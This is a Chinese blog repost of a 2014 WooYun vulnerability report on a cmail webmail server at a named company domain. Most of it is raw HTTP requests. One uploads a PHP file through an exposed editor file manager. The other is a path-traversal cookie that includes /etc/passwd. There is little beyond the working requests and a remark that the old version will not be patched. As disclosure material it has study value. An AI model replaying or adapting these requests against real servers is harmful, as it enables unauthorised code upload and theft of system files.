记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

cmail 文件包含漏洞加上传漏洞

2014-07-27 19:10

先是上传,编辑器惹的祸,你懂的,

cmail1.jpg





然后是文件包含



cmail12.jpg



漏洞证明:

上传啊:

POST /editor/filemanager/upload/php/upload.php HTTP/1.1

Host: mail.schneider-electric.cn

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://mail.schneider-electric.cn/editor/filemanager/upload/test.html

Cookie: xtvrn=$315507$; PHPSESSID=4be30638d370f0adc5a6316baf2ec380

Connection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------2250152263758

Content-Length: 340



-----------------------------2250152263758

Content-Disposition: form-data; name="NewFile"; filename="info.txt"

Content-Type: application/octet-stream



<?php

phpinfo();

?>

-----------------------------2250152263758--









文件包含:

GET /prog/index.php?language=chinese_gb.php HTTP/1.1

Host: mail.schneider-electric.cn

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: @Focusexe_Language_Cookie=../../../../../../../../../../etc/passwd

Connection: keep-alive

修复方案:

老板本,估计也不会更新,


知识来源: www.wooyun.org/bugs/wooyun-2014-064682

阅读:97014 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“cmail 文件包含漏洞加上传漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云